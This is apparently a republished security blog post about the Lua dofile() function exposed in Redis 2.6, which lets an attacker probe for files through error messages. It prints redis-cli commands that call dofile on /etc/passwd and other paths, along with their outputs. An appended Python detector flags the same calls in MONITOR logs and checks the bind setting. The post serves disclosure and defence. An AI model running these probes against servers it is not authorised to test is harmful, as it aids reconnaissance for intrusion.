Filesystem Enumeration using Redis and Lua
Source: Internet  Published by: ps软件下载官方网  Editor: 程序博客网  Time: 2024/06/05 01:07
Redis 2.6 was recently released by Antirez at the end of RedisConf. One of the major features that comes with 2.6 is embedded Lua scripting.
Even though the Lua sandbox inside Redis is locked down to the base library and a few others, we have found at least one way to abuse Lua to pull information from outside the sandbox.
There is a function, dofile(), that loads and executes a file from disk.
Given that Lua scripts are supposed to execute atomically, this function should not exist in the sandbox at all. We have a pending pull request to remove it.
The errors this function raises let an attacker determine whether a file or directory exists. That can help locate a web root or fingerprint the operating system. It is not a significant vulnerability in and of itself, but it hands an attacker information they would not otherwise have.
When a file doesn't exist we get a very obvious "No such file or directory" error:
net read 127.0.0.1:6379 id 1: -ERR Error running script (call to f_b5e5869caf1de9ffa1ae173bf46fef3024d3f987): cannot open /dev/a:No such file or directory
Here is an example of how to do this enumeration from a shell:
$ redis-cli -h localhost -p 6379 eval "dofile('/etc/passwd')" 0
(error) ERR Error running script (call to f_afdc51b5f9e34eced5fae459fc1d856af181aaf1): /etc/passwd:2: unexpected symbol near '#'
$ redis-cli -h localhost -p 6379 eval "dofile('/tmp')" 0
(error) ERR Error running script (call to f_70391feea8a62e239b3055c11b7d9d1d8c78db6e): cannot read /tmp:Is a directory
$ redis-cli -h localhost -p 6379 eval "dofile('/doesnotexist')" 0
(error) ERR Error running script (call to f_e84ccf03dc6b3547568096467afa7b3242ed108d): cannot open /doesnotexist: No such file or directory
Conclusion for penetration testers:
Keep an eye out for Redis servers on the network during your assessments.
Conclusion for everyone else:
Keep your Redis server off the Internet by setting "bind 127.0.0.1" in the redis.conf file.
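Two defender-side checks for the behaviour above, as an added example that is not part of the original post: one scans `redis-cli monitor` output for EVAL / SCRIPT LOAD bodies that call dofile() or loadfile(), the other verifies that redis.conf binds only to loopback as the post recommends. The MONITOR lines and config snippets are constructed samples, and the assumed MONITOR line layout is `<timestamp> [<db> <client>] "CMD" "arg" ...`.

```python
import re
import shlex

# Constructed sample of `redis-cli monitor` output. The first two lines are
# ordinary traffic; the last two are scripts that reach for the host filesystem.
SAMPLE_MONITOR = """\
1339518083.107412 [0 127.0.0.1:60866] "GET" "session:42"
1339518084.201544 [0 10.0.0.7:51422] "EVAL" "return redis.call('incr', KEYS[1])" "1" "hits"
1339518085.318201 [0 10.0.0.7:51422] "EVAL" "dofile('/etc/passwd')" "0"
1339518086.440913 [0 10.0.0.7:51422] "SCRIPT" "LOAD" "local f = loadfile('/tmp') return 1"
"""

# Constructed redis.conf fragment with the bind line commented out (listens everywhere).
SAMPLE_CONF = """\
port 6379
# bind 127.0.0.1
daemonize yes
"""

MONITOR_LINE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.*)$')
# Lua functions that read the host filesystem; none belongs in an atomic Redis script.
FILE_FUNCS = re.compile(r'\b(dofile|loadfile)\s*\(')

def find_file_access_scripts(monitor_text):
    """Return (client, command, script_body) for every EVAL or SCRIPT LOAD whose
    body calls dofile()/loadfile(). EVALSHA carries no body, so it is not inspected."""
    hits = []
    for line in monitor_text.splitlines():
        m = MONITOR_LINE.match(line)
        if not m:
            continue
        args = shlex.split(m.group('rest'))  # MONITOR double-quotes every argument
        if args and args[0].upper() == 'EVAL' and len(args) >= 2:
            body = args[1]
        elif len(args) >= 3 and args[0].upper() == 'SCRIPT' and args[1].upper() == 'LOAD':
            body = args[2]
        else:
            continue
        if FILE_FUNCS.search(body):
            hits.append((m.group('client'), args[0].upper(), body))
    return hits

def bind_is_loopback_only(conf_text):
    """True when every active `bind` directive names only a loopback address.
    No `bind` line at all means Redis listens on every interface, so that is False."""
    addrs = [tok for l in conf_text.splitlines() if l.strip().startswith('bind ')
             for tok in l.split()[1:]]
    return bool(addrs) and all(a in ('127.0.0.1', '::1') for a in addrs)
```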